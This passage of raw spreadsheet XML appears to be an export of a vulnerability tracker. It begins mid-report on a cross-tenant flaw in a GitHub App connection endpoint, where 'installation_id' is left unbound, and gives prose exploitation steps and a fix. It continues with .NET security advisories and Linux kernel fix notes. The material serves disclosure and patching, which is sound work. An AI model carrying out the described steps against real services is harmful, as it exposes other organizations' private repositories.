- Route: `internal/api/router.go:3590` — `POST /v1/workspaces/:workspace_id/projects/:project_id/github/connect/complete`. `installation_id` is read from the JSON body or the attacker-controlled `X-GitHub-Installation-ID` header (`router.go:3582-3588`).
- Service: `internal/api/github_connect.go:781` `CompleteGitHubConnection`. The `state` token IS rigorously bound to the caller's scope (`github_connect.go:818`: `if stateRecord.TenantID != scope.TenantID || stateRecord.WorkspaceID != project.WorkspaceID || stateRecord.ProjectID != project.ProjectID { ... }`), but the only check on `installation_id` is `request.InstallationID &lt;= 0` (`:794`). The raw client value is persisted as the workspace's connection (`:840`).
- Cross-tenant read primitive: `internal/connectors/github/repositories.go:39` `ListInstallationRepositories` → `internal/connectors/github/app.go:170` mints a token via `POST /app/installations/{installationId}/access_tokens` signed with the App JWT, succeeding for any installation where identrail's app is installed.
The feature-flagged V2 path `CompleteGitHubConnector` (`github_connect.go:447`, default off) shares the gap and is additionally weaker (matches pending connector by `state` value alone with no caller-scope re-check); a single fix should cover both.
## Intent proof
The code binds `state` to `{TenantID, WorkspaceID, ProjectID}` and re-verifies it at completion (`:818`), demonstrating it understands binding is required. The asymmetry — `state` bound, `installation_id` unbound — is the missed check.
## Exploitation
1. Attacker is any authenticated identrail tenant; they call `StartGitHubConnection` for their own workspace and receive a `state`.
2. Attacker calls the completion route with `{state: &lt;their state&gt;, installation_id: V}` where V is a victim org's identrail GitHub App installation id (installation ids are not secret — they appear in post-install redirect URLs, webhook payloads, the org's GitHub App settings, and are enumerable integers).
3. `CompleteGitHubConnection` accepts (state matches attacker scope), `ListInstallationRepositories(V)` mints a token for V and lists the victim org's private repos, and the connection is persisted under the attacker's workspace.
4. Attacker now reads the victim org's private repository inventory and can drive posture scans/repo reads via their own workspace.
Impact: cross-tenant disclosure of another customer organization's private GitHub repositories and metadata.
## Remediation
Bind `installation_id` with the same rigor as `state`: capture it from GitHub's signed post-install redirect (`setup_url`/`callback_url`) and pin it to the pending state at start time, and/or after minting verify the installation's `account` matches the org the initiating workspace is authorized for.</t>
        </is>
      </c>
      <c r="S1295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59185</t>
        </is>
      </c>
    </row>
    <row r="1296">
      <c r="A1296" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1296" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69304</t>
        </is>
      </c>
      <c r="D1296" s="5" t="inlineStr"/>
      <c r="E1296" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F1296" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1296" s="5" t="inlineStr"/>
      <c r="H1296" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I1296" s="5" t="inlineStr"/>
      <c r="J1296" s="5" t="inlineStr"/>
      <c r="K1296" s="5" t="inlineStr"/>
      <c r="L1296" s="5" t="inlineStr">
        <is>
          <t>nuget:Microsoft.AspNetCore.Server.IISIntegration</t>
        </is>
      </c>
      <c r="M1296" s="5" t="inlineStr">
        <is>
          <t>10.0.12, 11.0.0-rc.1, 8.0.31, 9.0.20</t>
        </is>
      </c>
      <c r="N1296" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1296" s="5" t="inlineStr"/>
      <c r="P1296" s="5" t="inlineStr"/>
      <c r="Q1296" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="R1296" s="5" t="inlineStr">
        <is>
          <t># Microsoft Security Advisory CVE-2026-69304 – ASP.NET Core Denial of Service Vulnerability
## Executive summary
Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core IIS out-of-process hosting and request decompression. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.
The IIS Middleware for ASP.NET Core did not properly constrain decompression of certain types of request, leading to excess memory consumption and a Denial of Service.
## Announcement
Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/443
## CVSS Details
- **Version:** 3.1
- **Severity:** Medium
- **Score:** 5.9
- **Vector:** `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H`
- **Weakness:** CWE-409 (Improper Handling of Highly Compressed Data (Data Amplification))
## Affected Platforms
- **Platforms:** Windows / IIS out-of-process
- **Architectures:** All
## &lt;a name="affected-packages"&gt;&lt;/a&gt;Affected Packages
The vulnerability affects any Microsoft .NET project if it uses any of affected package versions listed below
### &lt;a name=".NET 11 RC1"&gt;&lt;/a&gt;.NET 11 RC1
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[Microsoft.AspNetCore.Server.IISIntegration](https://www.nuget.org/packages/Microsoft.AspNetCore.Server.IISIntegration) | &gt;= 11.0.0-preview.1, &lt; 11.0.0-rc.1 | 11.0.0-rc.1
### &lt;a name=".NET 10"&gt;&lt;/a&gt;.NET 10
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[Microsoft.AspNetCore.Server.IISIntegration](https://www.nuget.org/packages/Microsoft.AspNetCore.Server.IISIntegration) | &gt;= 10.0.0, &lt;= 10.0.11 | 10.0.12
### &lt;a name=".NET 9"&gt;&lt;/a&gt;.NET 9
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[Microsoft.AspNetCore.Server.IISIntegration](https://www.nuget.org/packages/Microsoft.AspNetCore.Server.IISIntegration) | &gt;= 9.0.0, &lt;= 9.0.19 | 9.0.20
### &lt;a name=".NET 8"&gt;&lt;/a&gt;.NET 8
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[Microsoft.AspNetCore.Server.IISIntegration](https://www.nuget.org/packages/Microsoft.AspNetCore.Server.IISIntegration) | &gt;= 8.0.0, &lt;= 8.0.30 | 8.0.31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[CVE-2026-69304](https://www.cve.org/CVERecord?id=CVE-2026-69304)
### Acknowledgements
محمد السيد عثمان محمود القصاص
Anonymous
### Revisions
V1.0 (09/08/2026): Advisory published.</t>
        </is>
      </c>
      <c r="S1296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69304</t>
        </is>
      </c>
    </row>
    <row r="1297">
      <c r="A1297" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1297" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1297" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69439</t>
        </is>
      </c>
      <c r="D1297" s="5" t="inlineStr"/>
      <c r="E1297" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1297" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1297" s="5" t="inlineStr"/>
      <c r="H1297" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I1297" s="5" t="inlineStr"/>
      <c r="J1297" s="5" t="inlineStr"/>
      <c r="K1297" s="5" t="inlineStr"/>
      <c r="L1297" s="5" t="inlineStr">
        <is>
          <t>nuget:Microsoft.DiaSymReader.Native</t>
        </is>
      </c>
      <c r="M1297" s="5" t="inlineStr">
        <is>
          <t>18.9.0-beta1.26405.2</t>
        </is>
      </c>
      <c r="N1297" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1297" s="5" t="inlineStr"/>
      <c r="P1297" s="5" t="inlineStr"/>
      <c r="Q1297" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1297" s="5" t="inlineStr">
        <is>
          <t># Microsoft Security Advisory CVE-2026-69439 – .NET and Visual Studio Elevation of Privilege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parsing a Portable PDB file.
## Announcement
Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/438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[CVE-2026-69439](https://www.cve.org/CVERecord?id=CVE-2026-69439)
### Acknowledgements
41ae55e9310ff27fa6f26af4727e5590
### Revisions
V1.0 (09/08/2026): Advisory published.</t>
        </is>
      </c>
      <c r="S1297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69439</t>
        </is>
      </c>
    </row>
    <row r="1298">
      <c r="A1298" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1298" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69522</t>
        </is>
      </c>
      <c r="D1298" s="5" t="inlineStr"/>
      <c r="E1298" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1298" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1298" s="5" t="inlineStr"/>
      <c r="H1298" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I1298" s="5" t="inlineStr"/>
      <c r="J1298" s="5" t="inlineStr"/>
      <c r="K1298" s="5" t="inlineStr"/>
      <c r="L1298" s="5" t="inlineStr">
        <is>
          <t>nuget:Microsoft.DiaSymReader.Native</t>
        </is>
      </c>
      <c r="M1298" s="5" t="inlineStr">
        <is>
          <t>18.9.0-beta1.26405.2</t>
        </is>
      </c>
      <c r="N1298" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1298" s="5" t="inlineStr"/>
      <c r="P1298" s="5" t="inlineStr"/>
      <c r="Q1298" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1298" s="5" t="inlineStr">
        <is>
          <t># Microsoft Security Advisory CVE-2026-69522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processing PDB files.
## Announcement
Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/439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Supported .NET Framework versions listed in the [Microsoft Security Update Guide](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-69522) are also affected. Install the September 2026 .NET Framework security update applicable to a project's Windows version.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.NET Framework users must install the September 2026 security update applicable to their Windows version.
2. If a developer's application references Microsoft.DiaSymReader.Native, update the package reference to version 18.9.0-beta1.26405.2 or later.
Once users have installed the updated runtime, SDK, Visual Studio, or package, they should restart their apps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[CVE-2026-69522](https://www.cve.org/CVERecord?id=CVE-2026-69522)
### Acknowledgements
41ae55e9310ff27fa6f26af4727e5590
### Revisions
V1.0 (09/08/2026): Advisory published.</t>
        </is>
      </c>
      <c r="S1298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69522</t>
        </is>
      </c>
    </row>
    <row r="1299">
      <c r="A1299" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1299" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71328</t>
        </is>
      </c>
      <c r="D1299" s="5" t="inlineStr"/>
      <c r="E1299" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1299" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1299" s="5" t="inlineStr"/>
      <c r="H1299" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I1299" s="5" t="inlineStr"/>
      <c r="J1299" s="5" t="inlineStr"/>
      <c r="K1299" s="5" t="inlineStr"/>
      <c r="L1299" s="5" t="inlineStr">
        <is>
          <t>nuget:Microsoft.DiaSymReader.Native</t>
        </is>
      </c>
      <c r="M1299" s="5" t="inlineStr">
        <is>
          <t>18.9.0-beta1.26405.2</t>
        </is>
      </c>
      <c r="N1299" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1299" s="5" t="inlineStr"/>
      <c r="P1299" s="5" t="inlineStr"/>
      <c r="Q1299" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1299" s="5" t="inlineStr">
        <is>
          <t># Microsoft Security Advisory CVE-2026-71328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Microsoft.DiaSymReader.Native can perform an out of bounds write while processing MSFZ PDB files.
## Announcement
Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/440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[CVE-2026-71328](https://www.cve.org/CVERecord?id=CVE-2026-71328)
### Acknowledgements
41ae55e9310ff27fa6f26af4727e5590
### Revisions
V1.0 (09/08/2026): Advisory published.</t>
        </is>
      </c>
      <c r="S1299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71328</t>
        </is>
      </c>
    </row>
    <row r="1300">
      <c r="A1300" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1300" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80915</t>
        </is>
      </c>
      <c r="D1300" s="5" t="inlineStr"/>
      <c r="E1300" s="5" t="inlineStr"/>
      <c r="F1300" s="5" t="inlineStr"/>
      <c r="G1300" s="5" t="inlineStr"/>
      <c r="H1300" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1300" s="5" t="inlineStr"/>
      <c r="J1300" s="5" t="inlineStr"/>
      <c r="K1300" s="5" t="inlineStr"/>
      <c r="L1300" s="5" t="inlineStr"/>
      <c r="M1300" s="5" t="inlineStr"/>
      <c r="N1300" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1300" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1300" s="5" t="inlineStr"/>
      <c r="Q1300" s="5" t="inlineStr"/>
      <c r="R1300" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/xe: Fix DPT allocation paths.
Remove the fallback for VRAM to system memory, I tested it and that
doesn't work at all, only a black screen with pipe fault errors were
observed.
On systems with media GT, extra latency is added when accessing stolen
memory when the GT is in MC6. Since we additionally aren't counting how
much memory is used for stolen and we could in theory fill up the
entire stolen area with DPT's, avoid using stolen and only use the
default memory region.
Using stolen may also result in random system hangs under load.
(cherry picked from commit a196406a3831291598fe8e73245914f7acffdfe0)</t>
        </is>
      </c>
      <c r="S1300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80915</t>
        </is>
      </c>
    </row>
    <row r="1301">
      <c r="A1301" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1301" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80916</t>
        </is>
      </c>
      <c r="D1301" s="5" t="inlineStr"/>
      <c r="E1301" s="5" t="inlineStr"/>
      <c r="F1301" s="5" t="inlineStr"/>
      <c r="G1301" s="5" t="inlineStr"/>
      <c r="H1301" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1301" s="5" t="inlineStr"/>
      <c r="J1301" s="5" t="inlineStr"/>
      <c r="K1301" s="5" t="inlineStr"/>
      <c r="L1301" s="5" t="inlineStr"/>
      <c r="M1301" s="5" t="inlineStr"/>
      <c r="N1301" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1301" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1301" s="5" t="inlineStr"/>
      <c r="Q1301" s="5" t="inlineStr"/>
      <c r="R1301" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
kcov: fix data corruption and race conditions on PREEMPT_RT
syzbot is reporting KCOV state corruption on PREEMPT_RT kernels, for the
temporary storage used for saving/restoring remote KCOV state is currently
allocated as the per-CPU area.
On PREEMPT_RT kernels, softirq handlers run as preemptible task threads
(e.g., ksoftirqd). If a softirq context preempts a task running a remote
KCOV session, it safely saves the task's state into the per-CPU area.
However, if that softirq thread is subsequently preempted by a higher-
priority softirq thread on the same CPU, the second softirq will overwrite
the same per-CPU area, permanently destroying the original task's KCOV
state.
Fix this data corruption by moving the temporary storage from the per-CPU
area to the per-thread area. Since each softirq thread now owns its own
task context, nested softirq preemption no longer causes data overwrites.
Note that while the temporary storage is now on a per-thread basis, the
per-CPU kcov_percpu_data.lock must be retained, for we need to ensure that
kcov_remote_start() and kcov_remote_stop() operate atomically without
racing against asynchronous interrupts that manipulate the current task's
KCOV state.
It is likely that GFP_KERNEL allocation by vmalloc_node() in kcov_init()
has already called panic() before returning NULL, for there will be no
OOM-killable userspace processes when __init function of built-in module
runs. But this patch also fixes crashing the kernel when vmalloc_node()
in kcov_init() returned NULL, for kcov_init() left per-CPU irq_area == NULL
but kcov_remote_start() depends on per-CPU irq_area != NULL, resulting in
  (1) doing vmalloc() in kcov_remote_start() despite !in_task() context
  (2) out-of-array-bounds access if (1) succeeded but
      kcov-&gt;remote_size &lt; CONFIG_KCOV_IRQ_AREA_SIZE
  (3) always leak memory allocated by (1), eventually killing all
      OOM-killable userspace processes
problems.</t>
        </is>
      </c>
      <c r="S1301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80916</t>
        </is>
      </c>
    </row>
    <row r="1302">
      <c r="A1302" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1302" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80917</t>
        </is>
      </c>
      <c r="D1302" s="5" t="inlineStr"/>
      <c r="E1302" s="5" t="inlineStr"/>
      <c r="F1302" s="5" t="inlineStr"/>
      <c r="G1302" s="5" t="inlineStr"/>
      <c r="H1302" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1302" s="5" t="inlineStr"/>
      <c r="J1302" s="5" t="inlineStr"/>
      <c r="K1302" s="5" t="inlineStr"/>
      <c r="L1302" s="5" t="inlineStr"/>
      <c r="M1302" s="5" t="inlineStr"/>
      <c r="N1302" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1302" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1302" s="5" t="inlineStr"/>
      <c r="Q1302" s="5" t="inlineStr"/>
      <c r="R1302" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
PCI: host-generic: Fix NULL pointer dereference on 32-bit CAM systems
On 32-bit systems the config space is too large to ioremap in one go, so
pci_ecam_create() maps each bus segment separately and relies on the
-&gt;add_bus callback (pci_ecam_add_bus) to populate the per-bus mapping in
cfg-&gt;winp[]. pci_ecam_map_bus() then uses that mapping as the base for
every config access.
The generic ECAM ops (pci_generic_ecam_ops) already provide the -&gt;add_bus
and -&gt;remove_bus callbacks, but the CAM (legacy) ops in pci-host-generic.c
do not. As a result, on a 32-bit host using "pci-host-cam-generic" the
per-bus mapping is never set up and the first config read dereferences a
NULL base, crashing during bus enumeration:
 Unable to handle kernel NULL pointer dereference at virtual address 00000800
 Oops [#1]
 CPU: 0 PID: 1 Comm: swapper Not tainted 6.9.7+ #43
 Hardware name: Digilent Nexys-Video-A7 RV32 (DT)
 epc : pci_generic_config_read+0x40/0xb0
  ra : pci_generic_config_read+0x2c/0xb0
 [&lt;c038db9c&gt;] pci_generic_config_read+0x40/0xb0
 [&lt;c038da04&gt;] pci_bus_read_config_dword+0x50/0xb0
 [&lt;c0391e94&gt;] pci_bus_generic_read_dev_vendor_id+0x3c/0x1ec
 [&lt;c039245c&gt;] pci_scan_single_device+0xa4/0x11c
 [&lt;c0392570&gt;] pci_scan_slot+0x9c/0x23c
 [&lt;c039388c&gt;] pci_scan_child_bus_extend+0x58/0x2f4
 [&lt;c0393db0&gt;] pci_scan_root_bus_bridge+0x64/0xe8
 [&lt;c0393e54&gt;] pci_host_probe+0x20/0xc8
 [&lt;c03bc6f4&gt;] pci_host_common_probe+0x144/0x1e4
Fix this by giving the CAM ops the same -&gt;add_bus/-&gt;remove_bus callbacks.
Since pci_ecam_add_bus() and pci_ecam_remove_bus() are static to ecam.c,
move the CAM ops definition there as pci_generic_cam_ops (mirroring
pci_generic_ecam_ops) and export it for pci-host-generic.c to reference.
[mani: removed timestamp from log]</t>
        </is>
      </c>
      <c r="S1302" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80917</t>
        </is>
      </c>
    </row>
    <row r="1303">
      <c r="A1303" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1303" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80918</t>
        </is>
      </c>
      <c r="D1303" s="5" t="inlineStr"/>
      <c r="E1303" s="5" t="inlineStr"/>
      <c r="F1303" s="5" t="inlineStr"/>
      <c r="G1303" s="5" t="inlineStr"/>
      <c r="H1303" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1303" s="5" t="inlineStr"/>
      <c r="J1303" s="5" t="inlineStr"/>
      <c r="K1303" s="5" t="inlineStr"/>
      <c r="L1303" s="5" t="inlineStr"/>
      <c r="M1303" s="5" t="inlineStr"/>
      <c r="N1303" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1303" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1303" s="5" t="inlineStr"/>
      <c r="Q1303" s="5" t="inlineStr"/>
      <c r="R1303" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: core: fix number/pointer type confusion on long items
When fetch_item() is called by hid_scan_report() on an item with
HID_ITEM_TAG_LONG, it stores a pointer to the item data in
item-&gt;data.longdata instead of storing a value directly in
item-&gt;data.{u8/u16/u32}.
When item_udata() or item_sdata() encounters such an item, it incorrectly
assumes that the item is in short format, and therefore returns the lower
part of a kernel pointer reinterpreted as a number.
When a HID device is connected whose descriptor contains a
HID_GLOBAL_ITEM_TAG_REPORT_SIZE encoded in long format with size=4, this
causes the lower half of a kernel pointer to be printed into dmesg as a
number, like this:
    hid (null): invalid report_size 107953555
To fix it, let item_udata() and item_sdata() verify that the item is in
short format.
Note that this bug only affects hid_scan_report(), while the main parsing
pass hid_parse_collections() will always bail out when encountering a long
item.
Sidenote: There are currently no users of data.longdata; maybe we should
just remove any parsing of long-format descriptors as a follow-up.</t>
        </is>
      </c>
      <c r="S1303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80918</t>
        </is>
      </c>
    </row>
    <row r="1304">
      <c r="A1304" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1304" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80919</t>
        </is>
      </c>
      <c r="D1304" s="5" t="inlineStr"/>
      <c r="E1304" s="5" t="inlineStr"/>
      <c r="F1304" s="5" t="inlineStr"/>
      <c r="G1304" s="5" t="inlineStr"/>
      <c r="H1304" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1304" s="5" t="inlineStr"/>
      <c r="J1304" s="5" t="inlineStr"/>
      <c r="K1304" s="5" t="inlineStr"/>
      <c r="L1304" s="5" t="inlineStr"/>
      <c r="M1304" s="5" t="inlineStr"/>
      <c r="N1304" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1304" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1304" s="5" t="inlineStr"/>
      <c r="Q1304" s="5" t="inlineStr"/>
      <c r="R1304" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu: fix recursive ww_mutex acquire in amdgpu_devcoredump_format
When dumping IB contents from a hung job, amdgpu_devcoredump_format()
acquired the VM root PD's reservation via amdgpu_vm_lock_by_pasid() and
then, for each IB, called amdgpu_bo_reserve() on the BO backing the IB.
Both reservations are reservation_ww_class_mutex objects and neither
used a ww_acquire_ctx, which trips lockdep:
  WARNING: possible recursive locking detected
  --------------------------------------------
  kworker/u128:0 is trying to acquire lock:
  ffff88838b16e1f0 (reservation_ww_class_mutex){+.+.}-{4:4},
    at: amdgpu_devcoredump_format+0x1594/0x23f0 [amdgpu]
  but task is already holding lock:
  ffff8882f82681f0 (reservation_ww_class_mutex){+.+.}-{4:4},
    at: amdgpu_devcoredump_format+0x1594/0x23f0 [amdgpu]
   Possible unsafe locking scenario:
         CPU0
         ----
    lock(reservation_ww_class_mutex);
    lock(reservation_ww_class_mutex);
   *** DEADLOCK ***
   May be due to missing lock nesting notation
  Workqueue: events_unbound amdgpu_devcoredump_deferred_work [amdgpu]
  Call Trace:
   __ww_mutex_lock.constprop.0
   ww_mutex_lock
   amdgpu_bo_reserve
   amdgpu_devcoredump_format+0x1594 [amdgpu]
   amdgpu_devcoredump_deferred_work+0xea [amdgpu]
The two reservations are on different BOs in the captured trace, so the
splat is a lockdep-correctness warning, not an observed deadlock. It
becomes a real self-deadlock whenever the IB BO shares its dma_resv with
the root PD (the always-valid case, see amdgpu_vm_is_bo_always_valid()):
amdgpu_bo_reserve(abo) re-acquires the same ww_mutex without a ticket
and blocks forever. With amdgpu.gpu_recovery=0 the timeout handler
refires every ~2 s and each invocation produces this splat, drowning the
kernel ring buffer.
Now that amdgpu_vm_lock_by_pasid() takes a drm_exec context, move the IB
dumping into a separate helper that locks the root PD and every IB BO
together in a single drm_exec ticket. DRM_EXEC_IGNORE_DUPLICATES handles
IB BOs that share a dma_resv (e.g. always-valid BOs, or two IBs backed
by the same BO). Every lock is now a top-level acquire under one
ww_acquire_ctx, so the recursive ww_mutex condition is gone, and the
per-IB amdgpu_bo_reserve()/amdgpu_bo_unref() dance -- including a BO
refcount leak on the amdgpu_bo_reserve() failure path -- is removed.
(cherry picked from commit d6bf4242731219ee08ce54c365631e395486651e)</t>
        </is>
      </c>
      <c r="S1304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80919</t>
        </is>
      </c>
    </row>
    <row r="1305">
      <c r="A1305" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1305" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1305" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80920</t>
        </is>
      </c>
      <c r="D1305" s="5" t="inlineStr"/>
      <c r="E1305" s="5" t="inlineStr"/>
      <c r="F1305" s="5" t="inlineStr"/>
      <c r="G1305" s="5" t="inlineStr"/>
      <c r="H1305" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1305" s="5" t="inlineStr"/>
      <c r="J1305" s="5" t="inlineStr"/>
      <c r="K1305" s="5" t="inlineStr"/>
      <c r="L1305" s="5" t="inlineStr"/>
      <c r="M1305" s="5" t="inlineStr"/>
      <c r="N1305" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1305" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1305" s="5" t="inlineStr"/>
      <c r="Q1305" s="5" t="inlineStr"/>
      <c r="R1305" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
io_uring: defer eventfd signaling when queued from a wakeup handler
io_req_local_work_add() signals the CQ ring eventfd inline when it is the
one to push the first entry onto -&gt;work_list. For DEFER_TASKRUN rings that
add is frequently done from a waitqueue wakeup handler, where an
arbitrary waitqueue lock is held.
eventfd_signal_mask() only refuses to recurse when current-&gt;in_eventfd
is set, but that bit is set by eventfd_signal_mask() itself. If the wake
chain starts somewhere else, signal goes out inline and can feed back
into epoll.
Add IOU_F_TWQ_IN_WAKE, set it on the task_work add done from the three
waitqueue callbacks, and use it to force io_eventfd_signal() down the
existing call_rcu_hurry() deferral instead of signaling inline.</t>
        </is>
      </c>
      <c r="S1305" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80920</t>
        </is>
      </c>
    </row>
    <row r="1306">
      <c r="A1306" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1306" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1306" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80922</t>
        </is>
      </c>
      <c r="D1306" s="5" t="inlineStr"/>
      <c r="E1306" s="5" t="inlineStr"/>
      <c r="F1306" s="5" t="inlineStr"/>
      <c r="G1306" s="5" t="inlineStr"/>
      <c r="H1306" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1306" s="5" t="inlineStr"/>
      <c r="J1306" s="5" t="inlineStr"/>
      <c r="K1306" s="5" t="inlineStr"/>
      <c r="L1306" s="5" t="inlineStr"/>
      <c r="M1306" s="5" t="inlineStr"/>
      <c r="N1306" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1306" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1306" s="5" t="inlineStr"/>
      <c r="Q1306" s="5" t="inlineStr"/>
      <c r="R1306" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
